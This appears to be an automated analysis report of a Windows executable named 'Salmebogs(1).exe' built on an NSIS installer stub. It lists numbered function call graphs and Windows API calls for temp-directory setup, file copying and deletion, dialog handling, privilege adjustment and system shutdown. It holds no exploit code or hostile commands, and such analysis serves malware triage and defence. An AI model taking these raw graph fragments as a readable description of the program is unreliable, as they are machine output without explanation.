4038d2 3452->3453 3454 4038f1 lstrcatW 3453->3454 3456 405efa 3 API calls 3453->3456 3457 4038a0 3454->3457 3456->3454 3557 403b4c 3457->3557 3460 405ae9 18 API calls 3461 403923 3460->3461 3462 4039b7 3461->3462 3464 405efa 3 API calls 3461->3464 3463 405ae9 18 API calls 3462->3463 3465 4039bd 3463->3465 3466 403955 3464->3466 3467 4039cd LoadImageW 3465->3467 3468 40604f 18 API calls 3465->3468 3466->3462 3473 403976 lstrlenW 3466->3473 3474 405a0e CharNextW 3466->3474 3469 403a73 3467->3469 3470 4039f4 RegisterClassW 3467->3470 3468->3467 3472 40140b 2 API calls 3469->3472 3471 403a2a SystemParametersInfoW CreateWindowExW 3470->3471 3502 403a7d 3470->3502 3471->3469 3479 403a79 3472->3479 3475 403984 lstrcmpiW 3473->3475 3476 4039aa 3473->3476 3477 403973 3474->3477 3475->3476 3478 403994 GetFileAttributesW 3475->3478 3480 4059e1 3 API calls 3476->3480 3477->3473 3481 4039a0 3478->3481 3482 403b4c 19 API calls 3479->3482 3479->3502 3483 4039b0 3480->3483 3481->3476 3484 405a2d 2 API calls 3481->3484 3485 403a8a 3482->3485 3567 40602d lstrcpynW 3483->3567 3484->3476 3487 403a96 ShowWindow 3485->3487 3488 403b19 3485->3488 3490 406397 3 API calls 3487->3490 3489 40525f 5 API calls 3488->3489 3491 403b1f 3489->3491 3492 403aae 3490->3492 3493 403b23 3491->3493 3494 403b3b 3491->3494 3495 403abc GetClassInfoW 3492->3495 3499 406397 3 API calls 3492->3499 3501 40140b 2 API calls 3493->3501 3493->3502 3498 40140b 2 API calls 3494->3498 3496 403ad0 GetClassInfoW RegisterClassW 3495->3496 3497 403ae6 DialogBoxParamW 3495->3497 3496->3497 3500 40140b 2 API calls 3497->3500 3498->3502 3499->3495 3500->3502 3501->3502 3502->3349 3503->3353 3569 40602d lstrcpynW 3504->3569 3506 405afa 3507 405a8c 4 API calls 3506->3507 3508 405b00 3507->3508 3509 40359c 3508->3509 3510 4062c1 5 API calls 3508->3510 3509->3349 3518 40602d lstrcpynW 3509->3518 3516 405b10 3510->3516 3511 405b41 lstrlenW 3512 405b4c 3511->3512 3511->3516 3513 4059e1 3 API calls 3512->3513 3515 405b51 
GetFileAttributesW 3513->3515 3514 406370 2 API calls 3514->3516 3515->3509 3516->3509 3516->3511 3516->3514 3517 405a2d 2 API calls 3516->3517 3517->3511 3518->3385 3519->3354 3521 4037b4 3520->3521 3522 4037a6 CloseHandle 3520->3522 3570 4037e1 3521->3570 3522->3521 3527->3394 3528->3404 3530 405eef 3529->3530 3531 405ee2 3529->3531 3530->3404 3620 405d5c lstrcpyW 3531->3620 3534 405c3e GetTickCount GetTempFileNameW 3533->3534 3535 405c74 3534->3535 3536 40327b 3534->3536 3535->3534 3535->3536 3536->3339 3537->3421 3538->3423 3540 405a3b 3539->3540 3541 405a41 CharPrevW 3540->3541 3542 402e5a 3540->3542 3541->3540 3541->3542 3543 40602d lstrcpynW 3542->3543 3543->3427 3545 402d93 3544->3545 3546 402dab 3544->3546 3549 402da3 3545->3549 3550 402d9c DestroyWindow 3545->3550 3547 402db3 3546->3547 3548 402dbb GetTickCount 3546->3548 3551 406443 2 API calls 3547->3551 3552 402dc9 CreateDialogParamW ShowWindow 3548->3552 3553 402dec 3548->3553 3549->3430 3550->3549 3554 402db9 3551->3554 3552->3553 3553->3430 3554->3430 3555->3436 3556->3438 3558 403b60 3557->3558 3568 405f74 wsprintfW 3558->3568 3560 403bd1 3561 40604f 18 API calls 3560->3561 3562 403bdd SetWindowTextW 3561->3562 3563 403901 3562->3563 3564 403bf9 3562->3564 3563->3460 3564->3563 3565 40604f 18 API calls 3564->3565 3565->3564 3566->3457 3567->3462 3568->3560 3569->3506 3571 4037ef 3570->3571 3572 4037b9 3571->3572 3573 4037f4 FreeLibrary GlobalFree 3571->3573 3574 40581e 3572->3574 3573->3572 3573->3573 3575 405ae9 18 API calls 3574->3575 3576 40583e 3575->3576 3577 405846 DeleteFileW 3576->3577 3578 40585d 3576->3578 3579 4035cf OleUninitialize 3577->3579 3580 40597d 3578->3580 3610 40602d lstrcpynW 3578->3610 3579->3360 3579->3361 3580->3579 3585 406370 2 API calls 3580->3585 3582 405883 3583 405896 3582->3583 3584 405889 lstrcatW 3582->3584 3587 405a2d 2 API calls 3583->3587 3586 40589c 3584->3586 3588 4059a2 3585->3588 3589 4058ac lstrcatW 3586->3589 3590 4058b7 lstrlenW FindFirstFileW 3586->3590 
3587->3586 3588->3579 3591 4059e1 3 API calls 3588->3591 3589->3590 3590->3580 3608 4058d9 3590->3608 3592 4059ac 3591->3592 3594 4057d6 5 API calls 3592->3594 3593 405960 FindNextFileW 3597 405976 FindClose 3593->3597 3593->3608 3596 4059b8 3594->3596 3598 4059d2 3596->3598 3599 4059bc 3596->3599 3597->3580 3601 40518c 25 API calls 3598->3601 3599->3579 3602 40518c 25 API calls 3599->3602 3601->3579 3604 4059c9 3602->3604 3603 40581e 62 API calls 3603->3608 3606 405ece 38 API calls 3604->3606 3605 40518c 25 API calls 3605->3593 3606->3579 3607 40518c 25 API calls 3607->3608 3608->3593 3608->3603 3608->3605 3608->3607 3609 405ece 38 API calls 3608->3609 3611 40602d lstrcpynW 3608->3611 3612 4057d6 3608->3612 3609->3608 3610->3582 3611->3608 3613 405bdd 2 API calls 3612->3613 3614 4057e2 3613->3614 3615 405803 3614->3615 3616 4057f1 RemoveDirectoryW 3614->3616 3617 4057f9 DeleteFileW 3614->3617 3615->3608 3618 4057ff 3616->3618 3617->3618 3618->3615 3619 40580f SetFileAttributesW 3618->3619 3619->3615 3621 405d84 3620->3621 3622 405daa GetShortPathNameW 3620->3622 3647 405c02 GetFileAttributesW CreateFileW 3621->3647 3624 405ec9 3622->3624 3625 405dbf 3622->3625 3624->3530 3625->3624 3627 405dc7 wsprintfA 3625->3627 3626 405d8e CloseHandle GetShortPathNameW 3626->3624 3628 405da2 3626->3628 3629 40604f 18 API calls 3627->3629 3628->3622 3628->3624 3630 405def 3629->3630 3648 405c02 GetFileAttributesW CreateFileW 3630->3648 3632 405dfc 3632->3624 3633 405e0b GetFileSize GlobalAlloc 3632->3633 3634 405ec2 CloseHandle 3633->3634 3635 405e2d 3633->3635 3634->3624 3636 405c85 ReadFile 3635->3636 3637 405e35 3636->3637 3637->3634 3649 405b67 lstrlenA 3637->3649 3640 405e60 3642 405b67 4 API calls 3640->3642 3641 405e4c lstrcpyA 3643 405e6e 3641->3643 3642->3643 3644 405ea5 SetFilePointer 3643->3644 3645 405cb4 WriteFile 3644->3645 3646 405ebb GlobalFree 3645->3646 3646->3634 3647->3626 3648->3632 3650 405ba8 lstrlenA 3649->3650 3651 405bb0 3650->3651 3652 405b81 lstrcmpiA 
3650->3652 3651->3640 3651->3641 3652->3651 3653 405b9f CharNextA 3652->3653 3653->3650 3936 4014ff 3937 401507 3936->3937 3939 40151a 3936->3939 3938 402ba2 18 API calls 3937->3938 3938->3939 3940 401000 3941 401037 BeginPaint GetClientRect 3940->3941 3942 40100c DefWindowProcW 3940->3942 3944 4010f3 3941->3944 3945 401179 3942->3945 3946 401073 CreateBrushIndirect FillRect DeleteObject 3944->3946 3947 4010fc 3944->3947 3946->3944 3948 401102 CreateFontIndirectW 3947->3948 3949 401167 EndPaint 3947->3949 3948->3949 3950 401112 6 API calls 3948->3950 3949->3945 3950->3949 3951 405100 3952 405110 3951->3952 3953 405124 3951->3953 3954 405116 3952->3954 3955 40516d 3952->3955 3956 40512c IsWindowVisible 3953->3956 3962 405143 3953->3962 3958 40413d SendMessageW 3954->3958 3957 405172 CallWindowProcW 3955->3957 3956->3955 3959 405139 3956->3959 3960 405120 3957->3960 3958->3960 3964 404a56 SendMessageW 3959->3964 3962->3957 3969 404ad6 3962->3969 3965 404ab5 SendMessageW 3964->3965 3966 404a79 GetMessagePos ScreenToClient SendMessageW 3964->3966 3968 404aad 3965->3968 3967 404ab2 3966->3967 3966->3968 3967->3965 3968->3962 3978 40602d lstrcpynW 3969->3978 3971 404ae9 3979 405f74 wsprintfW 3971->3979 3973 404af3 3974 40140b 2 API calls 3973->3974 3975 404afc 3974->3975 3980 40602d lstrcpynW 3975->3980 3977 404b03 3977->3955 3978->3971 3979->3973 3980->3977 3981 402d04 3982 402d16 SetTimer 3981->3982 3984 402d2f 3981->3984 3982->3984 3983 402d84 3984->3983 3985 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3984->3985 3985->3983 3986 401904 3987 40193b 3986->3987 3988 402bbf 18 API calls 3987->3988 3989 401940 3988->3989 3990 40581e 69 API calls 3989->3990 3991 401949 3990->3991 3992 404205 lstrcpynW lstrlenW 3993 402786 3994 4029f7 3993->3994 3995 40278d 3993->3995 3996 402ba2 18 API calls 3995->3996 3997 402798 3996->3997 3998 40279f SetFilePointer 3997->3998 3998->3994 3999 4027af 3998->3999 4001 405f74 wsprintfW 3999->4001 4001->3994 4002 401907 4003 402bbf 
18 API calls 4002->4003 4004 40190e 4003->4004 4005 405772 MessageBoxIndirectW 4004->4005 4006 401917 4005->4006 4007 401e08 4008 402bbf 18 API calls 4007->4008 4009 401e0e 4008->4009 4010 402bbf 18 API calls 4009->4010 4011 401e17 4010->4011 4012 402bbf 18 API calls 4011->4012 4013 401e20 4012->4013 4014 402bbf 18 API calls 4013->4014 4015 401e29 4014->4015 4016 401423 25 API calls 4015->4016 4017 401e30 ShellExecuteW 4016->4017 4018 401e61 4017->4018 4019 404b08 GetDlgItem GetDlgItem 4020 404b5a 7 API calls 4019->4020 4029 404d73 4019->4029 4021 404bf0 SendMessageW 4020->4021 4022 404bfd DeleteObject 4020->4022 4021->4022 4023 404c06 4022->4023 4024 404c3d 4023->4024 4028 40604f 18 API calls 4023->4028 4025 4040f1 19 API calls 4024->4025 4030 404c51 4025->4030 4026 404f03 4031 404f15 4026->4031 4032 404f0d SendMessageW 4026->4032 4027 404e57 4027->4026 4036 404eb0 SendMessageW 4027->4036 4062 404d66 4027->4062 4033 404c1f SendMessageW SendMessageW 4028->4033 4029->4027 4034 404a56 5 API calls 4029->4034 4054 404de4 4029->4054 4035 4040f1 19 API calls 4030->4035 4039 404f27 ImageList_Destroy 4031->4039 4040 404f2e 4031->4040 4049 404f3e 4031->4049 4032->4031 4033->4023 4034->4054 4055 404c5f 4035->4055 4041 404ec5 SendMessageW 4036->4041 4036->4062 4037 404158 8 API calls 4042 4050f9 4037->4042 4038 404e49 SendMessageW 4038->4027 4039->4040 4043 404f37 GlobalFree 4040->4043 4040->4049 4045 404ed8 4041->4045 4043->4049 4044 404d34 GetWindowLongW SetWindowLongW 4048 404d4d 4044->4048 4057 404ee9 SendMessageW 4045->4057 4046 4050ad 4047 4050bf ShowWindow GetDlgItem ShowWindow 4046->4047 4046->4062 4047->4062 4050 404d53 ShowWindow 4048->4050 4051 404d6b 4048->4051 4049->4046 4061 404ad6 4 API calls 4049->4061 4066 404f79 4049->4066 4070 404126 SendMessageW 4050->4070 4071 404126 SendMessageW 4051->4071 4054->4027 4054->4038 4055->4044 4056 404caf SendMessageW 4055->4056 4058 404d2e 4055->4058 4059 404ceb SendMessageW 4055->4059 4060 404cfc SendMessageW 4055->4060 
4056->4055 4057->4026 4058->4044 4058->4048 4059->4055 4060->4055 4061->4066 4062->4037 4063 405083 InvalidateRect 4063->4046 4064 405099 4063->4064 4072 404a11 4064->4072 4065 404fa7 SendMessageW 4069 404fbd 4065->4069 4066->4065 4066->4069 4068 405031 SendMessageW SendMessageW 4068->4069 4069->4063 4069->4068 4070->4062 4071->4029 4075 404948 4072->4075 4074 404a26 4074->4046 4076 404961 4075->4076 4077 40604f 18 API calls 4076->4077 4078 4049c5 4077->4078 4079 40604f 18 API calls 4078->4079 4080 4049d0 4079->4080 4081 40604f 18 API calls 4080->4081 4082 4049e6 lstrlenW wsprintfW SetDlgItemTextW 4081->4082 4082->4074 4088 40458c 4089 4045b8 4088->4089 4090 4045c9 4088->4090 4149 405756 GetDlgItemTextW 4089->4149 4092 4045d5 GetDlgItem 4090->4092 4097 404634 4090->4097 4094 4045e9 4092->4094 4093 4045c3 4096 4062c1 5 API calls 4093->4096 4099 4045fd SetWindowTextW 4094->4099 4104 405a8c 4 API calls 4094->4104 4095 404718 4146 4048c7 4095->4146 4151 405756 GetDlgItemTextW 4095->4151 4096->4090 4097->4095 4101 40604f 18 API calls 4097->4101 4097->4146 4102 4040f1 19 API calls 4099->4102 4100 404748 4105 405ae9 18 API calls 4100->4105 4106 4046a8 SHBrowseForFolderW 4101->4106 4107 404619 4102->4107 4103 404158 8 API calls 4108 4048db 4103->4108 4109 4045f3 4104->4109 4110 40474e 4105->4110 4106->4095 4111 4046c0 CoTaskMemFree 4106->4111 4112 4040f1 19 API calls 4107->4112 4109->4099 4113 4059e1 3 API calls 4109->4113 4152 40602d lstrcpynW 4110->4152 4114 4059e1 3 API calls 4111->4114 4115 404627 4112->4115 4113->4099 4116 4046cd 4114->4116 4150 404126 SendMessageW 4115->4150 4119 404704 SetDlgItemTextW 4116->4119 4124 40604f 18 API calls 4116->4124 4119->4095 4120 40462d 4122 406407 5 API calls 4120->4122 4121 404765 4123 406407 5 API calls 4121->4123 4122->4097 4131 40476c 4123->4131 4125 4046ec lstrcmpiW 4124->4125 4125->4119 4128 4046fd lstrcatW 4125->4128 4126 4047ad 4153 40602d lstrcpynW 4126->4153 4128->4119 4129 4047b4 4130 405a8c 4 API calls 4129->4130 4132 
4047ba GetDiskFreeSpaceW 4130->4132 4131->4126 4134 405a2d 2 API calls 4131->4134 4136 404805 4131->4136 4135 4047de MulDiv 4132->4135 4132->4136 4134->4131 4135->4136 4137 404a11 21 API calls 4136->4137 4147 404876 4136->4147 4140 404863 4137->4140 4138 404899 4154 404113 KiUserCallbackDispatcher 4138->4154 4139 40140b 2 API calls 4139->4138 4142 404878 SetDlgItemTextW 4140->4142 4143 404868 4140->4143 4142->4147 4145 404948 21 API calls 4143->4145 4144 4048b5 4144->4146 4155 404521 4144->4155 4145->4147 4146->4103 4147->4138 4147->4139 4149->4093 4150->4120 4151->4100 4152->4121 4153->4129 4154->4144 4156 404534 SendMessageW 4155->4156 4157 40452f 4155->4157 4156->4146 4157->4156 4158 40428e 4160 4042a6 4158->4160 4162 4043c0 4158->4162 4159 40442a 4161 4044fc 4159->4161 4163 404434 GetDlgItem 4159->4163 4164 4040f1 19 API calls 4160->4164 4169 404158 8 API calls 4161->4169 4162->4159 4162->4161 4167 4043fb GetDlgItem SendMessageW 4162->4167 4165 4044bd 4163->4165 4166 40444e 4163->4166 4168 40430d 4164->4168 4165->4161 4174 4044cf 4165->4174 4166->4165 4173 404474 6 API calls 4166->4173 4189 404113 KiUserCallbackDispatcher 4167->4189 4171 4040f1 19 API calls 4168->4171 4172 4044f7 4169->4172 4176 40431a CheckDlgButton 4171->4176 4173->4165 4177 4044e5 4174->4177 4178 4044d5 SendMessageW 4174->4178 4175 404425 4180 404521 SendMessageW 4175->4180 4187 404113 KiUserCallbackDispatcher 4176->4187 4177->4172 4179 4044eb SendMessageW 4177->4179 4178->4177 4179->4172 4180->4159 4182 404338 GetDlgItem 4188 404126 SendMessageW 4182->4188 4184 40434e SendMessageW 4185 404374 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4184->4185 4186 40436b GetSysColor 4184->4186 4185->4172 4186->4185 4187->4182 4188->4184 4189->4175 4190 401a15 4191 402bbf 18 API calls 4190->4191 4192 401a1e ExpandEnvironmentStringsW 4191->4192 4193 401a32 4192->4193 4195 401a45 4192->4195 4194 401a37 lstrcmpW 4193->4194 4193->4195 4194->4195 4196 402515 4197 402bbf 18 API calls 
4196->4197 4198 40251c 4197->4198 4201 405c02 GetFileAttributesW CreateFileW 4198->4201 4200 402528 4201->4200 4202 402095 4203 402bbf 18 API calls 4202->4203 4204 40209c 4203->4204 4205 402bbf 18 API calls 4204->4205 4206 4020a6 4205->4206 4207 402bbf 18 API calls 4206->4207 4208 4020b0 4207->4208 4209 402bbf 18 API calls 4208->4209 4210 4020ba 4209->4210 4211 402bbf 18 API calls 4210->4211 4213 4020c4 4211->4213 4212 402103 CoCreateInstance 4217 402122 4212->4217 4213->4212 4214 402bbf 18 API calls 4213->4214 4214->4212 4215 401423 25 API calls 4216 4021e1 4215->4216 4217->4215 4217->4216 4218 401b16 4219 402bbf 18 API calls 4218->4219 4220 401b1d 4219->4220 4221 402ba2 18 API calls 4220->4221 4222 401b26 wsprintfW 4221->4222 4223 402a4c 4222->4223 3077 403c19 3078 403c31 3077->3078 3079 403d6c 3077->3079 3078->3079 3080 403c3d 3078->3080 3081 403dbd 3079->3081 3082 403d7d GetDlgItem GetDlgItem 3079->3082 3084 403c48 SetWindowPos 3080->3084 3085 403c5b 3080->3085 3083 403e17 3081->3083 3091 401389 2 API calls 3081->3091 3086 4040f1 19 API calls 3082->3086 3092 403d67 3083->3092 3147 40413d 3083->3147 3084->3085 3088 403c60 ShowWindow 3085->3088 3089 403c78 3085->3089 3090 403da7 SetClassLongW 3086->3090 3088->3089 3093 403c80 DestroyWindow 3089->3093 3094 403c9a 3089->3094 3095 40140b 2 API calls 3090->3095 3096 403def 3091->3096 3097 40407a 3093->3097 3098 403cb0 3094->3098 3099 403c9f SetWindowLongW 3094->3099 3095->3081 3096->3083 3102 403df3 SendMessageW 3096->3102 3097->3092 3108 4040ab ShowWindow 3097->3108 3100 403d59 3098->3100 3101 403cbc GetDlgItem 3098->3101 3099->3092 3166 404158 3100->3166 3105 403cec 3101->3105 3106 403ccf SendMessageW IsWindowEnabled 3101->3106 3102->3092 3103 40140b 2 API calls 3116 403e29 3103->3116 3104 40407c DestroyWindow EndDialog 3104->3097 3110 403cf9 3105->3110 3112 403d40 SendMessageW 3105->3112 3113 403d0c 3105->3113 3122 403cf1 3105->3122 3106->3092 3106->3105 3108->3092 3109 40604f 18 API calls 3109->3116 3110->3112 
3110->3122 3111 4040f1 19 API calls 3111->3116 3112->3100 3117 403d14 3113->3117 3118 403d29 3113->3118 3115 403d27 3115->3100 3116->3092 3116->3103 3116->3104 3116->3109 3116->3111 3138 403fbc DestroyWindow 3116->3138 3150 4040f1 3116->3150 3160 40140b 3117->3160 3119 40140b 2 API calls 3118->3119 3121 403d30 3119->3121 3121->3100 3121->3122 3163 4040ca 3122->3163 3124 403ea4 GetDlgItem 3125 403ec1 ShowWindow KiUserCallbackDispatcher 3124->3125 3126 403eb9 3124->3126 3153 404113 KiUserCallbackDispatcher 3125->3153 3126->3125 3128 403eeb EnableWindow 3131 403eff 3128->3131 3129 403f04 GetSystemMenu EnableMenuItem SendMessageW 3130 403f34 SendMessageW 3129->3130 3129->3131 3130->3131 3131->3129 3154 404126 SendMessageW 3131->3154 3155 40602d lstrcpynW 3131->3155 3134 403f62 lstrlenW 3135 40604f 18 API calls 3134->3135 3136 403f78 SetWindowTextW 3135->3136 3156 401389 3136->3156 3138->3097 3139 403fd6 CreateDialogParamW 3138->3139 3139->3097 3140 404009 3139->3140 3141 4040f1 19 API calls 3140->3141 3142 404014 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3141->3142 3143 401389 2 API calls 3142->3143 3144 40405a 3143->3144 3144->3092 3145 404062 ShowWindow 3144->3145 3146 40413d SendMessageW 3145->3146 3146->3097 3148 404155 3147->3148 3149 404146 SendMessageW 3147->3149 3148->3116 3149->3148 3151 40604f 18 API calls 3150->3151 3152 4040fc SetDlgItemTextW 3151->3152 3152->3124 3153->3128 3154->3131 3155->3134 3158 401390 3156->3158 3157 4013fe 3157->3116 3158->3157 3159 4013cb MulDiv SendMessageW 3158->3159 3159->3158 3161 401389 2 API calls 3160->3161 3162 401420 3161->3162 3162->3122 3164 4040d1 3163->3164 3165 4040d7 SendMessageW 3163->3165 3164->3165 3165->3115 3167 404170 GetWindowLongW 3166->3167 3168 4041f9 3166->3168 3167->3168 3169 404181 3167->3169 3168->3092 3170 404190 GetSysColor 3169->3170 3171 404193 3169->3171 3170->3171 3172 4041a3 SetBkMode 3171->3172 3173 404199 SetTextColor 3171->3173 3174 4041c1 3172->3174 3175 4041bb GetSysColor 
3172->3175 3173->3172 3176 4041d2 3174->3176 3177 4041c8 SetBkColor 3174->3177 3175->3174 3176->3168 3178 4041e5 DeleteObject 3176->3178 3179 4041ec CreateBrushIndirect 3176->3179 3177->3176 3178->3179 3179->3168 3315 40159b 3316 402bbf 18 API calls 3315->3316 3317 4015a2 SetFileAttributesW 3316->3317 3318 4015b4 3317->3318 4224 401f1d 4225 402bbf 18 API calls 4224->4225 4226 401f24 4225->4226 4227 406407 5 API calls 4226->4227 4228 401f33 4227->4228 4229 401fb7 4228->4229 4230 401f4f GlobalAlloc 4228->4230 4230->4229 4231 401f63 4230->4231 4232 406407 5 API calls 4231->4232 4233 401f6a 4232->4233 4234 406407 5 API calls 4233->4234 4235 401f74 4234->4235 4235->4229 4239 405f74 wsprintfW 4235->4239 4237 401fa9 4240 405f74 wsprintfW 4237->4240 4239->4237 4240->4229 4241 40229d 4242 4022a5 4241->4242 4245 4022ab 4241->4245 4243 402bbf 18 API calls 4242->4243 4243->4245 4244 402bbf 18 API calls 4246 4022b9 4244->4246 4245->4244 4245->4246 4247 402bbf 18 API calls 4246->4247 4249 4022c7 4246->4249 4247->4249 4248 402bbf 18 API calls 4250 4022d0 WritePrivateProfileStringW 4248->4250 4249->4248 4251 40149e 4252 402288 4251->4252 4253 4014ac PostQuitMessage 4251->4253 4253->4252 4254 40249e 4264 402cc9 4254->4264 4256 4024a8 4257 402ba2 18 API calls 4256->4257 4258 4024b1 4257->4258 4259 4024d5 RegEnumValueW 4258->4259 4260 4024c9 RegEnumKeyW 4258->4260 4262 40281e 4258->4262 4261 4024ee RegCloseKey 4259->4261 4259->4262 4260->4261 4261->4262 4265 402bbf 18 API calls 4264->4265 4266 402ce2 4265->4266 4267 402cf0 RegOpenKeyExW 4266->4267 4267->4256 4268 40231f 4269 402324 4268->4269 4270 40234f 4268->4270 4271 402cc9 19 API calls 4269->4271 4272 402bbf 18 API calls 4270->4272 4273 40232b 4271->4273 4274 402356 4272->4274 4275 402bbf 18 API calls 4273->4275 4278 40236c 4273->4278 4279 402bff RegOpenKeyExW 4274->4279 4276 40233c RegDeleteValueW RegCloseKey 4275->4276 4276->4278 4280 402c2a 4279->4280 4287 402c76 4279->4287 4281 402c50 RegEnumKeyW 4280->4281 4282 402c62 
RegCloseKey 4280->4282 4283 402c87 RegCloseKey 4280->4283 4285 402bff 5 API calls 4280->4285 4281->4280 4281->4282 4284 406407 5 API calls 4282->4284 4283->4287 4286 402c72 4284->4286 4285->4280 4286->4287 4288 402ca2 RegDeleteKeyW 4286->4288 4287->4278 4288->4287 4289 401ca3 4290 402ba2 18 API calls 4289->4290 4291 401ca9 IsWindow 4290->4291 4292 401a05 4291->4292 4293 402a27 SendMessageW 4294 402a41 InvalidateRect 4293->4294 4295 402a4c 4293->4295 4294->4295 4296 40242a 4297 402cc9 19 API calls 4296->4297 4298 402434 4297->4298 4299 402bbf 18 API calls 4298->4299 4300 40243d 4299->4300 4301 402448 RegQueryValueExW 4300->4301 4305 40281e 4300->4305 4302 40246e RegCloseKey 4301->4302 4303 402468 4301->4303 4302->4305 4303->4302 4307 405f74 wsprintfW 4303->4307 4307->4302 4308 40172d 4309 402bbf 18 API calls 4308->4309 4310 401734 SearchPathW 4309->4310 4311 40174f 4310->4311 4312 403834 4313 40383f 4312->4313 4314 403843 4313->4314 4315 403846 GlobalAlloc 4313->4315 4315->4314 4316 4027b4 4317 4027ba 4316->4317 4318 4027c2 FindClose 4317->4318 4319 402a4c 4317->4319 4318->4319 4320 401b37 4321 401b44 4320->4321 4322 401b88 4320->4322 4323 401bcd 4321->4323 4328 401b5b 4321->4328 4324 401bb2 GlobalAlloc 4322->4324 4325 401b8d 4322->4325 4327 40604f 18 API calls 4323->4327 4332 402288 4323->4332 4326 40604f 18 API calls 4324->4326 4325->4332 4341 40602d lstrcpynW 4325->4341 4326->4323 4331 402282 4327->4331 4339 40602d lstrcpynW 4328->4339 4334 405772 MessageBoxIndirectW 4331->4334 4333 401b9f GlobalFree 4333->4332 4334->4332 4335 401b6a 4340 40602d lstrcpynW 4335->4340 4337 401b79 4342 40602d lstrcpynW 4337->4342 4339->4335 4340->4337 4341->4333 4342->4332 4343 402537 4344 402562 4343->4344 4345 40254b 4343->4345 4347 402596 4344->4347 4348 402567 4344->4348 4346 402ba2 18 API calls 4345->4346 4354 402552 4346->4354 4349 402bbf 18 API calls 4347->4349 4350 402bbf 18 API calls 4348->4350 4351 40259d lstrlenW 4349->4351 4352 40256e WideCharToMultiByte lstrlenA 
4350->4352 4351->4354 4352->4354 4353 4025ca 4355 405cb4 WriteFile 4353->4355 4357 4025e0 4353->4357 4354->4353 4356 405ce3 5 API calls 4354->4356 4354->4357 4355->4357 4356->4353 4358 4014b8 4359 4014be 4358->4359 4360 401389 2 API calls 4359->4360 4361 4014c6 4360->4361 3180 4015b9 3181 402bbf 18 API calls 3180->3181 3182 4015c0 3181->3182 3200 405a8c CharNextW CharNextW 3182->3200 3184 401629 3186 40165b 3184->3186 3187 40162e 3184->3187 3185 405a0e CharNextW 3195 4015c9 3185->3195 3190 401423 25 API calls 3186->3190 3206 401423 3187->3206 3198 401653 3190->3198 3194 401642 SetCurrentDirectoryW 3194->3198 3195->3184 3195->3185 3196 4015f2 3195->3196 3197 40160f GetFileAttributesW 3195->3197 3210 4056f5 3195->3210 3218 4056d8 CreateDirectoryW 3195->3218 3196->3195 3213 40565b CreateDirectoryW 3196->3213 3197->3195 3201 405aa9 3200->3201 3202 405abb 3200->3202 3201->3202 3203 405ab6 CharNextW 3201->3203 3204 405a0e CharNextW 3202->3204 3205 405adf 3202->3205 3203->3205 3204->3202 3205->3195 3207 40518c 25 API calls 3206->3207 3208 401431 3207->3208 3209 40602d lstrcpynW 3208->3209 3209->3194 3221 406407 GetModuleHandleA 3210->3221 3214 4056a8 3213->3214 3215 4056ac GetLastError 3213->3215 3214->3196 3215->3214 3216 4056bb SetFileSecurityW 3215->3216 3216->3214 3217 4056d1 GetLastError 3216->3217 3217->3214 3219 4056ec GetLastError 3218->3219 3220 4056e8 3218->3220 3219->3220 3220->3195 3222 406423 3221->3222 3223 40642d GetProcAddress 3221->3223 3227 406397 GetSystemDirectoryW 3222->3227 3225 4056fc 3223->3225 3225->3195 3226 406429 3226->3223 3226->3225 3228 4063b9 wsprintfW LoadLibraryExW 3227->3228 3228->3226 4368 40293b 4369 402ba2 18 API calls 4368->4369 4370 402941 4369->4370 4371 402964 4370->4371 4372 40297d 4370->4372 4380 40281e 4370->4380 4375 402969 4371->4375 4376 40297a 4371->4376 4373 402993 4372->4373 4374 402987 4372->4374 4378 40604f 18 API calls 4373->4378 4377 402ba2 18 API calls 4374->4377 4382 40602d lstrcpynW 4375->4382 4383 405f74 wsprintfW 
4376->4383 4377->4380 4378->4380 4382->4380 4383->4380 4384 40423f lstrlenW 4385 404260 WideCharToMultiByte 4384->4385 4386 40425e 4384->4386 4386->4385

Control-flow Graph (function 0040327D, NSIS stub entry)

[Basic-block dump with executed/not-executed colouring omitted; the recoverable flow is: 40327d SetErrorMode, GetVersion; dynamic import resolution via 406407 (GetModuleHandleA/GetProcAddress) and 406397 (GetSystemDirectoryW, wsprintfW, LoadLibraryExW) with an lstrlenA check on "UXTHEME"; COMCTL32 #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW; a CharNextW loop over the command line (blocks 4033a0-403486); GetTempPathW, falling back to GetWindowsDirectoryW + "\Temp" and then to GetTempPathW + "Low" with SetEnvironmentVariableW for TEMP and TMP, each candidate validated by 40324c (CreateDirectoryW, GetTempFileNameW); DeleteFileW, then 402dee reads the stub's own image (GetModuleFileNameW, CreateFileW, GetFileSize, ReadFile, SetFilePointer, GlobalAlloc); either the UI path 403876 (LoadImageW, RegisterClassW, CreateWindowExW, DialogBoxParamW) or the self-copy path (SetCurrentDirectoryW, DeleteFileW, CopyFileW, MoveFileExW); cleanup via 40379c (FreeLibrary, GlobalFree, recursive delete through 40581e) and OleUninitialize; exit either through ExitProcess, through OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges and ExitWindowsEx, or through the MessageBoxIndirectW error path followed by ExitProcess.]
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE ref: 004032A0
                                                                        • GetVersion.KERNEL32 ref: 004032A6
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032CF
                                                                        • #17.COMCTL32(00000007,00000009), ref: 004032F2
                                                                        • OleInitialize.OLE32(00000000), ref: 004032F9
                                                                        • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403315
                                                                        • GetCommandLineW.KERNEL32(007A7A20,NSIS Error), ref: 0040332A
                                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000), ref: 0040333D
                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Salmebogs(1).exe",00000020), ref: 00403364
                                                                          • Part of subcall function 00406407: GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
                                                                          • Part of subcall function 00406407: GetProcAddress.KERNEL32(00000000,?), ref: 00406434
                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040349E
                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034AF
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BB
